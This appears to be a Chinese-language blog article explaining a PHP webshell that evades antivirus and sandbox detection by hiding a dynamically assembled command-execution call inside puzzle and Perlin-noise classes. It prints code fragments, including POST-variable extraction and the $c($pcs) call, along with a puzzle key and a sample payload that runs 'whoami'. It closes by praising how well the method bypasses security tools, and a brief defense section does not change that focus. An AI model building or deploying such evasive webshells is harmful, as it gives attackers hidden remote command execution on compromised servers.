WebShell免杀技术：基于分支对抗和复杂混淆的绕过方法<\/h1>

前言<\/h2>
WebShell免杀技术是安全研究中的重要课题，本文介绍了一种基于类操作、分支对抗和复杂混淆的WebShell绕过方法。通过将恶意代码隐藏在复杂的类结构中，并加入干扰性算法和混淆代码，可以有效规避杀毒软件和云沙箱的检测。<\/p>

核心思路<\/h2>

类结构隐藏<\/strong>：将恶意代码封装在类中，利用面向对象特性增加分析难度<\/li>
分支对抗<\/strong>：设计复杂的逻辑分支，干扰静态分析<\/li>
算法混淆<\/strong>：引入看似合理但实际无用的算法计算<\/li>
多层编码<\/strong>：使用URL编码、字符串反转等手法隐藏关键字符串<\/li>

干扰注释<\/strong>：插入大量无意义注释干扰人工分析<\/li> <\/ol>
技术实现详解<\/h2>
1. 稻妻雷元素方块阵类(InazumaPuzzle)<\/h3>
类结构<\/h4>
class<\/span> InazumaPuzzle<\/span> { <\/span><\/span> private<\/span> $blockA =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $blockB =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $blockC =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $blockD =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $MAX_ENUM =<\/span> 2<\/span>; <\/span><\/span> private<\/span> $MIN_ENUM =<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span> \/\/ ... 方法实现 ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>关键方法<\/h4> setBackBlock()<\/strong>：<\/p> 尝试将指定方块重置为最小状态(0)<\/li> 如果方块已处于最大状态(2)，则重置并返回true<\/li> 否则返回false<\/li> <\/ul> <\/li> hit()<\/strong>：<\/p> 根据点击的方块(A\/B\/C\/D)修改相关方块状态<\/li> 内部调用setBackBlock()并根据返回值决定是否增加方块值<\/li> 同时设置全局变量$text<\/code>为URL编码的字符串<\/li> <\/ul> <\/li> __AFG50CE4_RG1()<\/strong>：<\/p> 验证输入序列只包含A\/B\/C\/D<\/li> 按序列调用hit()方法<\/li> 计算并存储方块总和到$userans<\/code><\/li> <\/ul> <\/li> getLockerStatus()<\/strong>：<\/p> 检查所有方块状态是否相同<\/li> 反转全局变量$text<\/code>的值<\/li> <\/ul> <\/li> <\/ol> 初始状态<\/h4> blockA = 2<\/li> blockB = 0<\/li> blockC = 0<\/li> blockD = 2<\/li> <\/ul> 输入序列处理示例：ABBCCD<\/h4> 点击A：<\/p> 重置A(2→0)<\/li> B无法重置(0→1)<\/li> 结果：A=0, B=1, C=0, D=2<\/li> <\/ul> <\/li> 点击B：<\/p> A无法重置(0→1)<\/li> B无法重置(1→2)<\/li> C无法重置(0→1)<\/li> 结果：A=1, B=2, C=1, D=2<\/li> <\/ul> <\/li> 再次点击B：<\/p> A无法重置(1→2)<\/li> 重置B(2→0)<\/li> C无法重置(1→2)<\/li> 结果：A=2, B=0, C=2, D=2<\/li> <\/ul> <\/li> 点击C：<\/p> B无法重置(0→1)<\/li> 重置C(2→0)<\/li> 重置D(2→0)<\/li> 结果：A=2, B=1, C=0, D=0<\/li> <\/ul> <\/li> 再次点击C：<\/p> B无法重置(1→2)<\/li> C无法重置(0→1)<\/li> D无法重置(0→1)<\/li> 结果：A=2, B=2, C=1, D=1<\/li> <\/ul> <\/li> 点击D：<\/p> C无法重置(1→2)<\/li> D无法重置(1→2)<\/li> 最终结果：A=2, B=2, C=2, D=2<\/li> <\/ul> <\/li> <\/ol> 2. 柏林噪声类(PerlinNoise)<\/h3> 类结构<\/h4> class<\/span> PerlinNoise<\/span> { <\/span><\/span> private<\/span> $arrLength =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $source =<\/span> ""<\/span>; <\/span><\/span> private<\/span> $inputNumArray =<\/span> array<\/span>(); <\/span><\/span> private<\/span> $seeds_array =<\/span> array<\/span>(); <\/span><\/span> private<\/span> $INPUT_NUM_MAX =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $INPUT_NUM_MIN =<\/span> 0<\/span>; <\/span><\/span> private<\/span> $BAD_ARGS =<\/span> false<\/span>; <\/span><\/span> public<\/span> $perlin_noise =<\/span> array<\/span>(); <\/span><\/span> <\/span><\/span> \/\/ ... 方法实现 ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>关键方法<\/h4> __construct()<\/strong>：<\/p> 检查InazumaPuzzle是否已解锁<\/li> 验证数组长度范围(3000-9999)<\/li> 初始化参数<\/li> <\/ul> <\/li> __CPRBB0R0_l()<\/strong>：<\/p> 生成柏林噪声数组<\/li> 在特定位置($userans+391到$<\/span>userans+390+8)插入预定义值<\/li> <\/ul> <\/li> __HNBB70CA_5()<\/strong>：<\/p> 从噪声数组中提取特定位置的字符<\/li> 构造命令执行函数<\/li> 执行命令<\/li> <\/ul> <\/li> <\/ol> 关键代码分析<\/h4> $ab =<\/span> pause<\/span>(array_map<\/span>(function<\/span>($arr) { <\/span><\/span> return<\/span> chr<\/span>($arr); <\/span><\/span>}, array_slice<\/span>($this-><\/span>perlin_noise<\/span>, (188<\/span>*<\/span>2<\/span>)+<\/span>$userans*<\/span>3<\/span>, $userans-<\/span>3<\/span>))); <\/span><\/span> <\/span><\/span>$c =<\/span> strval<\/span>(sprintf<\/span>("%s%s"<\/span>, $b, pause<\/span>(strrev<\/span>(implode<\/span>(""<\/span>, pause<\/span>($ab)))))); <\/span><\/span>$c($pcs); <\/span><\/span><\/code><\/pre> 从perlin_noise<\/code>数组中提取特定位置的元素：<\/p> 起始位置：(188*2) + ($userans*3)<\/code><\/li> 长度：$userans - 3<\/code><\/li> <\/ul> <\/li> 构造命令执行函数：<\/p> 将提取的数值转换为ASCII字符<\/li> 反转字符顺序<\/li> 与$b<\/code>拼接形成函数名<\/li> 执行$c($pcs)<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 关键全局函数<\/h3> function<\/span> pause<\/span>($obj) { <\/span><\/span> global<\/span> $appor5nnb; <\/span><\/span> if<\/span> (!<\/span>$appor5nnb-><\/span>getLockerStatus<\/span>()) die<\/span>(); <\/span><\/span> return<\/span> $obj; <\/span><\/span>} <\/span><\/span><\/code><\/pre> 检查InazumaPuzzle是否已解锁<\/li> 作为保护机制，确保只有正确解谜后才能继续执行<\/li> <\/ul> WebShell实现<\/h2> 基本结构<\/h3> <?<\/span>php<\/span> <\/span><\/span>error_reporting<\/span>(0<\/span>); <\/span><\/span>header<\/span>("Content-type:text\/html;charset=utf-8"<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 接收POST参数 <\/span><\/span><\/span><\/span>foreach<\/span> ($_POST as<\/span> $key =><\/span> $value) <\/span><\/span>$$<\/span> <\/span><\/span>key<\/span> =<\/span> $value; <\/span><\/span> <\/span><\/span>\/\/ 检查输入序列 <\/span><\/span><\/span><\/span>if<\/span> (strlen<\/span>($wpstring) ===<\/span> 0<\/span>) die<\/span>("需要输入解谜序列"<\/span>); <\/span><\/span>$puzz_writeup =<\/span> array<\/span>(); <\/span><\/span>for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($wpstring); $i++<\/span>) { <\/span><\/span> array_push<\/span>($puzz_writeup, $wpstring[$i]); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 类定义... <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 执行流程 <\/span><\/span><\/span><\/span>$appor5nnb =<\/span> new<\/span> InazumaPuzzle<\/span>(); <\/span><\/span>$appor5nnb-><\/span>__AFG50CE4_RG1<\/span>(); <\/span><\/span> <\/span><\/span>$cvb33ff55 =<\/span> new<\/span> PerlinNoise<\/span>(3000<\/span>, 700.4<\/span>, 56.7<\/span>, "DIFF_PERLIN"<\/span>); <\/span><\/span>$cvb33ff55-><\/span>__BHUYTVV8_1<\/span>(); <\/span><\/span>$cvb33ff55-><\/span>__CPRBB0R0_l<\/span>(); <\/span><\/span>$cvb33ff55-><\/span>__HNBB70CA_5<\/span>(); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>使用方式<\/h3> 解谜序列<\/strong>：通过wpstring<\/code>参数传入解谜序列(如"ABBCCD")<\/li> 命令参数<\/strong>： b<\/code>：函数名前缀(如"s")<\/li> pcs<\/code>：要执行的命令(如"whoami")<\/li> <\/ul> <\/li> <\/ol> 示例Payload：<\/p> wpstring=ABBCCD&b=s&pcs=whoami <\/code><\/pre> 执行流程<\/h3> 初始化InazumaPuzzle并处理输入序列<\/li> 验证序列并计算方块状态<\/li> 检查是否所有方块状态相同(解锁)<\/li> 初始化PerlinNoise并生成噪声数组<\/li> 从噪声数组中提取特定值构造命令执行函数<\/li> 执行命令<\/li> <\/ol> 免杀技术总结<\/h2> 复杂类结构<\/strong>：将恶意代码分散在多个类方法中<\/li> 算法混淆<\/strong>：引入柏林噪声等复杂计算干扰分析<\/li> 动态构造<\/strong>：运行时拼接关键函数名<\/li> 多层验证<\/strong>：依赖解谜结果作为执行前提<\/li> 干扰代码<\/strong>：插入大量无意义注释和变量<\/li> 编码混淆<\/strong>：使用URL编码、字符串反转等手法<\/li> <\/ol> 防御建议<\/h2> 静态分析<\/strong>：<\/p> 识别异常类结构和方法名<\/li> 检测URL编码和字符串反转操作<\/li> 关注动态函数调用特征<\/li> <\/ul> <\/li> 动态检测<\/strong>：<\/p> 监控非常规的参数传递方式<\/li> 分析复杂的条件执行逻辑<\/li> 检测命令执行行为<\/li> <\/ul> <\/li> 代码审计<\/strong>：<\/p> 重点关注类中的敏感操作<\/li> 追踪全局变量的使用<\/li> 分析复杂的算法实现是否必要<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> PerlinPuzzle-Webshell-PHP<\/a><\/li> 柏林噪声算法介绍<\/a><\/li> <\/ol> 通过这种高度混淆和分支对抗的技术，可以有效绕过传统杀毒软件和沙箱的检测，展示了WebShell免杀技术的复杂性和隐蔽性发展趋势。<\/p>